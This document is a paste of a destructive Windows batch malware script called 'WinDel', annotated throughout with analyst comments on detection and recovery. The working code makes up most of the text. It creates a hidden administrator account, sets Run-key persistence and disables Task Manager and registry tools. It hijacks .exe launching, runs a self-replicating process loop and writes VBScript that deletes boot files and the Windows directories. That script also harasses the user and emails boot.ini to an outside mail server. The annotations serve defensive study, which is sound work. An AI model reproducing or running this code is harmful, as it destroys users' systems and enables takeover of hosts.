MineHack7488

WinDel

Oct 4th, 2021 (edited)
  rem Analyst note: opening stage of a destructive Windows batch script (paste title: WinDel).
  rem It starts matrix.bat from the current directory (contents not shown on this page), then
  rem calls rundll32 to swap mouse buttons and to request keyboard/mouse "disable" entry points,
  rem and issues a del aimed at the Windows cursor files.
  rem chcp 1251 selects the Cyrillic code page, consistent with the Russian strings used later.
  rem Detection: cmd.exe spawning rundll32 with SwapMouseButton, "keyboard,disable" or
  rem "mouse,disable" on the command line (process-creation logging, e.g. event 4688 / Sysmon 1).
  1. start %cd%\matrix.bat
  2. :virus
  3. @echo off
  4. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  5. del "%SystemRoot%Cursors*.*" >nul
  6. chcp 1251
  7. title WinDel working...
  8. color a
  9. rundll32 user,SwapMouseButton
  10. rundll32 keyboard,disable
  11. rundll32 mouse,disable
  12.  
  rem Analyst note: bulk remapping of file-extension associations with the assoc builtin.
  rem Executable, system, document, archive and media extensions are pointed at unrelated
  rem types, so opening files from the shell stops working as expected. Output goes to nul.
  rem Detection: a single cmd.exe session issuing many "assoc .ext=" changes in a row;
  rem extension defaults under HKCR changing in a burst (registry auditing / Sysmon 13).
  rem Recovery: restore the extension mappings from a known-good baseline or backup.
  13. assoc .exe=.mp3 >nul
  14. assoc .mp3=.bmp >nul
  15. assoc .bmp=.mp3 >nul
  16. assoc .jpg=.mp3 >nul
  17. assoc .avi=.jpg >nul
  18. assoc .txt=.mp3 >nul
  19. assoc .sys=.mp3 >nul
  20. assoc .dll=.mp3 >nul
  21. assoc .tmp=.mp3 >nul
  22. assoc .ini=.mp3 >nul
  23. assoc .flv=.txt >nul
  24. assoc .doc=.mp3 >nul
  25. assoc .rar=.mp3 >nul
  26. assoc .xls=.mp3 >nul
  27. assoc .xlsx=.mp3 >nul
  28. assoc .log=.mp3 >nul
  29. assoc .rtf=.mp3 >nul
  30. assoc .rif=.mp3>nul
  31. assoc .docm=.mp3 >nul
  32. assoc .scr=.mp3 >nul
  33. assoc .cif=.mp3 >nul
  34. assoc .zip=.mp3 >nul
  35. assoc .dat=.mp3 >nul
  36. assoc .inf=.mp3 >nul
  37. assoc .gif=.rar >nul
  38. assoc .wav=.zip >nul
  39. assoc .mp4=.txt >nul
  40. assoc .jpeg=.mp4 >nul
  41.  
  rem Analyst note: unconditional loop labelled :spam. Each pass relaunches this script (%0),
  rem force-kills explorer.exe, opens several desktop applications and broadcasts a message
  rem with msg *. Because every pass starts another copy, the process count keeps growing
  rem and the host is exhausted (resource-exhaustion / denial of service on the endpoint).
  rem Detection: rapid, repeated child processes (chrome, mspaint, notepad, calc, msg) under
  rem cmd.exe, together with "taskkill /f /im explorer.exe".
  42. :spam
  43. start %0
  44. taskkill /f /im explorer.exe >nul
  45. start chrome
  46. start mspaint
  47. start notepad
  48. start calc
  49. msg * Deleting windows...
  50. goto spam
  51.  
  rem Analyst note: local account manipulation. If reached, these commands delete the
  rem built-in SUPPORT_388945a0 account, create a local user named "hacker" with a hardcoded
  rem password, and add it to the Russian-localised Administrators group. The last line
  rem targets the Winlogon SpecialAccounts UserList key with a value named "support" set to 0;
  rem a 0 value under that key hides an account from the logon screen.
  rem Detection: Security log events 4720 (account created), 4732 (added to local group) and
  rem 4726 (account deleted); net.exe / net1.exe with "user ... /add" or "localgroup ... /add".
  rem Response: treat an unexpected local admin named "hacker" as an indicator and remove it.
  52. net user SUPPORT_388945a0 /delete
  53. net user hacker hack /add
  54. net localgroup Администраторы hacker /add
  55. net localgroup Пользователи SUPPORT_388945a0 /del
  56. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
  57.  
  rem Analyst note: start of the dropper stage. A del is aimed at the driver cache cabinet,
  rem the DisableTaskMgr policy value is set to 1 for the current user, and three VBScript
  rem files (temp.vbs, temp1.vbs, temp2.vbs) begin to be written line by line into %temp%.
  rem temp.vbs starts with "on error resume next", so script errors are suppressed at run time.
  rem Detection: cmd.exe redirecting echo output into *.vbs under %TEMP%; DisableTaskMgr
  rem being set under the Policies\System key.
  58. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  59. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  60. echo Chr(39)>%temp%\temp1.vbs
  61. echo Chr(39)>%temp%\temp2.vbs
  62. echo on error resume next > %temp%\temp.vbs
  63. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  64. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  rem Analyst note: persistence and drive hiding. The first listing line carries several
  rem statements run together as pasted; it references Explorer policy values (nodesktop,
  rem ClassicShell) under one hardcoded user SID and stores the script path (%0) in a variable.
  rem The script is then copied to %SystemRoot%\user32dll.bat and registered under the HKLM
  rem Run key as "RunExplorer32" (ATT&CK T1547.001, registry run keys).
  rem NoDrives / NoViewOnDrive = 67108863 is 2^26-1, i.e. the bit for every drive letter A-Z.
  rem Detection: new .bat written into %SystemRoot%; Run-key value pointing at a batch file;
  rem NoDrives or NoViewOnDrive set outside managed Group Policy.
  65. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  66. copy %¶§% %SystemRoot%\user32dll.bat
  67. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  68. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  69. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  rem Analyst note: destructive payload appended to %temp%\temp.vbs, interleaved with
  rem Internet Explorer restriction values. The VBScript lines use FileSystemObject to force-
  rem delete the boot loader file, Windows directories on several drive letters, hal.dll and
  rem the dllcache folder (SystemRoot is read from the registry first). This is data
  rem destruction aimed at making the OS unbootable (ATT&CK T1485).
  rem The regwrite lines overwrite the Recycle Bin display string (CLSID 645FF040-...) and the
  rem RegisteredOwner / RegisteredOrganization values with the marker "forum.whack.ru".
  rem Detection: wscript/cscript deleting files under the Windows directory; the marker string
  rem appearing in RegisteredOwner or RegisteredOrganization.
  rem Recovery: offline repair or reimage; restore from backup rather than trusting the host.
  70. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  71. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  72. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  73. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  74. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  75. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  76. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  77. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  78. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  79. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  80. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  81. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  82. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  83. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  84. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
  85. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
  86. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
  rem Analyst note: two nuisance scripts are (re)written into %temp%. The single ">" on the
  rem first line of each truncates whatever was in the file before.
  rem temp1.vbs: endless do/loop that keeps calling getfile on A:\ (constant drive polling).
  rem temp2.vbs: endless do/loop that runs a hidden command shell echoing Chr(7), the BEL
  rem character, i.e. continuous beeping with a stream of short-lived child processes.
  rem Both suppress errors with "on error resume next".
  rem Detection: wscript.exe repeatedly spawning %comspec% with a hidden window; sustained
  rem high process-creation rate from a script host.
  87. echo on error resume next > %temp%\temp1.vbs
  88. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  89. echo do>>%temp%\temp1.vbs
  90. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  91. echo loop>>%temp%\temp1.vbs
  92. echo on error resume next > %temp%\temp2.vbs
  93. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  94. echo do>>%temp%\temp2.vbs
  95. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  96. echo loop>>%temp%\temp2.vbs
  rem Analyst note: per-user policy lockdown written with reg add ... /f (no prompt).
  rem Under Policies\System: Task Manager and registry editing tools are disabled.
  rem Under Policies\Explorer: Start-menu items, Run, Find, Control Panel, network
  rem connections and shutdown (NoClose) are hidden or blocked. The NonEnum value uses the
  rem My Computer CLSID (20D04FE0-...). Together these remove the usual recovery tools from
  rem the logged-on user (ATT&CK T1112, modify registry).
  rem Detection: disabletaskmgr / disableregistrytools set to 1 from reg.exe rather than
  rem Group Policy; a burst of Policies\Explorer writes from one cmd.exe parent.
  rem Recovery: these are HKCU policy values; remove them from an administrative or offline
  rem context (or load the user hive) and sign the user out and back in.
  97. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  98. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  99. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  100. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  101. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  102. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  103. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  104. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  105. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  106. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  107. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  108. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  109. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  110. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  111. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  112. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  113. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  114. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  115. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  116. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  117. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  118. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  119. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  120. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  121. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  rem Analyst note: temp.vbs gains a Shell.Application call that minimises all windows.
  rem A second HKLM Run value, "SwapNT", re-applies the mouse-button swap at each logon, and
  rem the swap is also started immediately. The last line replaces the default open command
  rem for the exefile class with rundll32.exe, which stops .exe files from launching normally.
  rem Detection: any write to HKCR\exefile\shell\open\command is a high-signal event; Run-key
  rem values whose data starts with rundll32.
  rem Recovery: restore the exefile open command to its default from a known-good baseline.
  122. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  123. echo application.minimizeall>>%temp%\temp.vbs
  124. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  125. start rundll32 user32, SwapMouseButton
  126. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  rem Analyst note: more lines appended to %temp%\temp.vbs, all user-harassment behaviour.
  rem  - a counter loop showing modal popups titled with the "forum.whack.ru" marker;
  rem  - an endless do/loop toggling Caps Lock, Num Lock and Scroll Lock via SendKeys with
  rem    200 ms sleeps between keystrokes;
  rem  - enumeration of optical drives through WMPlayer.OCX.7 and an eject call on each.
  rem The ^ characters escape > and < so cmd writes them into the file instead of treating
  rem them as redirection.
  rem Detection: wscript.exe instantiating WMPlayer.OCX.7; synthetic lock-key toggling.
  127. echo i=50 >> %temp%\temp.vbs
  128. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  129. echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
  130. echo i=i-1 >> %temp%\temp.vbs
  131. echo wend >> %temp%\temp.vbs
  132. echo do >> %temp%\temp.vbs
  133. echo wscript.sleep 200 >> %temp%\temp.vbs
  134. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  135. echo wscript.sleep 200 >> %temp%\temp.vbs
  136. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  137. echo wscript.sleep 200 >> %temp%\temp.vbs
  138. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  139. echo loop>> %temp%\temp.vbs
  140. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  141. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  142. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  143. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  144. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  145. echo next >> %temp%\temp.vbs
  146. echo End If >> %temp%\temp.vbs
  rem Analyst note: notification e-mail routine appended to %temp%\temp.vbs. SendPost builds
  rem a CDO.Message configured for authenticated SMTP (sendusing = 2, smtpauthenticate = 1)
  rem to smtp.mail.ru on port 25 with a hardcoded username and password, attaches c:\boot.ini
  rem and sends it. The body text is a short Russian message announcing the infection.
  rem This is the only network activity visible in the listing.
  rem Detection: wscript.exe / cscript.exe creating CDO.Message or opening outbound TCP 25;
  rem connections from workstations to smtp.mail.ru.
  rem Mitigation: block direct outbound SMTP from endpoints at the egress firewall.
  147. echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
  148. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  149. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  150. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  151. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  152. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
  153. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
  154. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
  155. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
  156. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
  157. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
  158. echo Flds.Update >> %temp%\temp.vbs
  159. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  160. echo iMsg.To = strTo >> %temp%\temp.vbs
  161. echo iMsg.From = strFrom >> %temp%\temp.vbs
  162. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  163. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  164. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  165. echo iMsg.Send >> %temp%\temp.vbs
  166. echo End Function >> %temp%\temp.vbs
  167. echo Set iMsg = Nothing >> %temp%\temp.vbs
  168. echo Set iConf = Nothing >> %temp%\temp.vbs
  169. echo Set Flds = Nothing >> %temp%\temp.vbs
  170.  
  rem Analyst note: the three generated scripts are launched through their file association
  rem (start on a .vbs path), so the script host appears as a child of cmd.exe.
  rem Detection: wscript.exe executing .vbs files from %TEMP%. Blocking or constraining the
  rem Windows Script Host on endpoints that do not need it removes this execution path.
  171. start %temp%\temp.vbs
  172. start %temp%\temp1.vbs
  173. start %temp%\temp2.vbs
  174.  
  rem Analyst note: final destructive step and loop back. Calls a rundll32 "disableoemlayer"
  rem entry point, issues a del against HAL.dll in system32 (a boot-critical file), then jumps
  rem to the :virus label at the top of the script so the whole sequence repeats.
  rem Detection: del or other delete operations against %systemroot%\system32\HAL.dll.
  175. rundll32 user,disableoemlayer
  176. del %systemroot%\system32\HAL.dll
  177. goto virus
  178.  
  rem Analyst note: requests a restart after 5 seconds with a short Russian-language comment
  rem shown to the user. It follows an unconditional goto in the listing.
  rem Detection: shutdown.exe /r with a very short /t timeout launched from a script.
  179. shutdown /r /t 5 /c "Не плач!"